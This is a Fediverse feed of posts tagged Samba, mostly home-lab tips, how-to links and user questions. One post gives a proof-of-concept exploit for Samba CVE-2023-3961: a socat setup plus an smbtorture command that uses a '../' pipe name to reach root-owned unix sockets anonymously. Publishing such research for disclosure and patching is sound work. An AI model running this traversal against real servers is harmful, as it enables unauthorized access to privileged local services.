harrysintonen, (edited ) to random

Interesting smbd CVE-2023-3961 allows samba client to connect to any server side unix domain socket. The access occurs as root user and thus any named unix domain socket is fully accessible. If suitable service exist on the server this will lead to unauthorized access to the service, assuming the socket file access rights are the only means of authorization. The impact depends entirely on the available services on the server, but may lead to or similar high severity impacts.

Updated to add: This vulnerability is made more difficult to exploit since the attacker has somewhat limited control on the data being sent to the socket.

https://www.samba.org/samba/security/CVE-2023-3961.html

raptor, to random

CVE-2023-3961: allows client access to unix domain sockets on the file system

A client sending a pipe name containing unix directory traversal characters (../) could cause to connect to arbitrary unix domain sockets as root.

https://www.samba.org/samba/security/CVE-2023-3961.html

synchron, to android German
@synchron@norden.social avatar

Wie bekommt man ein dazu Dateien, vorrangig Bilder und Videos auf ein Share zu laden? Ich hätte sowas unter "Teilen" in der Galerie erwartet aber scheinbar ist das kein unterstütztes Feature...
Jemand eine Idee wie das geht?
Geht generell um und Netzwerk Zugriff auf die Daten.
Bin dankbar über jeden Hinweis.

dustinrue, to proxmox
@dustinrue@chateaude.luxe avatar

Thoughts on Proxmox and Home Lab Use

This post is really a small collection of thoughts about Proxmox when used in a home lab situation and home labs in general. I was originally going to post this to Mastodon only but it didn't fit in a single post.

A lot of people (at least what I see on reddit) build Proxmox systems with shared file systems like ceph, even for home lab use.

https://dustinrue.com/2024/04/thoughts-on-proxmox-and-home-lab-use/

#ceph #proxmox #samba #truenas #zfs

dnanian, to jazz
@dnanian@mas.to avatar

Stan Getz & Charlie Byrd - Jazz Samba

A semi-repeat from back in April - but that was my Dad's original copy, and this is the Verve/Acoustic Sounds re-release...which also sound great.

bsm, to Madeira German
@bsm@swiss.social avatar
conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar

Wizards can conjure entire realms using spells they learned from shared scrolls. #Samba #FreeBSD #OpenSource https://cromwell-intl.com/open-source/samba-active-directory/?s=mc

fosslife, to linux
@fosslife@fosstodon.org avatar

Learn how to synchronize your data on a local or remote computer with rsync https://www.fosslife.org/synchronize-your-data-rsync

harrysintonen, to infosec

Here is a Proof of Concept demonstrating the smbd CVE-2023-3961

  1. On victim host running vulnerable Samba set up a unix domain socket only accessible as root user:
    $ sudo socat UNIX-LISTEN:/pwned,mode=700,fork stdout

  2. On attacking host:
    $ smbtorture -U "" -N ncacn_np:victimhost[/pipe/../../../../../pwned] rpc.echo

At least stock Debian install samba allows anonymous exploitation in this manner. This is quite alarming, to say the least.

Note: smbtorture is built as part of samba build procedure – On Debian based systems you can use sudo apt build-dep samba && apt source samba && cd samba-* && dpkg-buildpackage to get it. Specify LD_LIBRARY_PATH as needed to make it find the necessary shared objects.

smbtorture will talk MS-RPC protocol to the unix domain socket, and as such is not directly useful as generic tool. the vulnerability is left as exercise for the reader.

Addendum: You can't fully control the data being sent to the socket. This will like neuter most attack scenarios.

heisec, to security German

Samba: Neue Versionen beheben mehrere Sicherheitslücken

Durch verschiedene Programmierfehler konnten Angreifer auf geheime Informationen bis hin zum Kerberos-TGT-Passwort zugreifen. Aktualisierungen stehen bereit.

https://www.heise.de/news/Samba-Neue-Versionen-beheben-mehrere-Sicherheitsluecken-9335169.html?wt_mc=sm.red.ho.mastodon.mastodon.md_beitraege.md_beitraege

viking, to linux
@viking@fosstodon.org avatar

TIL that Windows doesn't discover samba shares on Linux via NETBIOS anymore. It requires running a Web Service Discovery host daemon.

https://github.com/christgau/wsdd

neustradamus, to debian
@neustradamus@mastodon.social avatar
giggls, to random German
@giggls@karlsruhe-social.de avatar

Hm unter Debian11 (smbclient aus samba 4.13.13) tut das hier
(mit KRB5CCNAME=FILE:/tmp/krb5cc_nslcd):
smbclient -N --use-kerberos=required -gL <server>
Unter Debian 12 (smbclient aus samba 4.17.9) nicht mehr.
Mach ich was falsch oder wurde in bzw. das entsprechende Debianpaket ein Bug eingebaut?

conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar

Wizards enslave some devices to serve other machines. What foul sorcery is this? https://cromwell-intl.com/open-source/samba-active-directory/slave-dns.html?s=mc

philpem, to WindowsXP
@philpem@digipres.club avatar

Alongside my page on the Chyron, I've also documented how to network-install from a system using , and

https://www.philpem.me.uk/computer/winxp_netinst

... and all because I couldn't get XP Setup to boot off of a USB stick I made with Rufus!

There's a short explainer about how the boot process fits together, and the rest is a HOWTO.

conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar

Here lies a chronicle of all that passed while building a great realm. https://cromwell-intl.com/open-source/samba-active-directory/summary.html?s=mc

conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar
conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar

Wizards can conjure great spells through knowledge alone, spending no gold. https://cromwell-intl.com/open-source/samba-active-directory/samba.html?s=mc

conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar

Here lies a chronicle of all that passed while building a great realm. https://cromwell-intl.com/open-source/samba-active-directory/summary.html?s=mc

conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar

Wizards enslave some devices to serve other machines. What foul sorcery is this? https://cromwell-intl.com/open-source/samba-active-directory/slave-dns.html?s=mc

mpts, to macos
@mpts@mastodon.social avatar

Has anyone successfully mounted on or shares hosted on a server?

If I use NFSv3, then all my shares are full of files (i.e., with the "._" prefix).

If I use , then "git fetch" just hangs forever and never finishes.

If I use , then either 1) everything is 755 but I cannot delete files xD or 2) (after applying https://askubuntu.com/a/1126633/413683) the permissions are correct, but something is wrong with my .git: ad_convert: Failed to convert [.git].

:(

governa, to ubuntu
@governa@fosstodon.org avatar

How to Enable and Use Nautilus / / Windows File Sharing Feature on 24.04 LTS :ubuntu:

https://linuxhint.com/how-to-enable-and-use-nautilus-samba-cifs-windows-file-sharing-feature-on-ubuntu-24-04-lts/

conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar

Wizards can conjure entire realms using spells they learned from shared scrolls. #Samba #FreeBSD #OpenSource https://cromwell-intl.com/open-source/samba-active-directory/?s=mc

conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar
conansysadmin, to FreeBSD
@conansysadmin@mstdn.social avatar

A guide worth his baksheesh can lead you to any tavern you care to name, or to any temple you dare to visit. https://cromwell-intl.com/open-source/samba-active-directory/dns.html?s=mc

  • All
  • Subscribed
  • Moderated
  • Favorites
  • JUstTest
  • rosin
  • InstantRegret
  • khanakhh
  • ngwrru68w68
  • osvaldo12
  • DreamBathrooms
  • mdbf
  • magazineikmin
  • thenastyranch
  • everett
  • Youngstown
  • slotface
  • kavyap
  • provamag3
  • GTA5RPClips
  • Durango
  • cubers
  • modclub
  • tester
  • tacticalgear
  • cisconetworking
  • ethstaker
  • anitta
  • Leos
  • megavids
  • normalnudes
  • lostlight
  • All magazines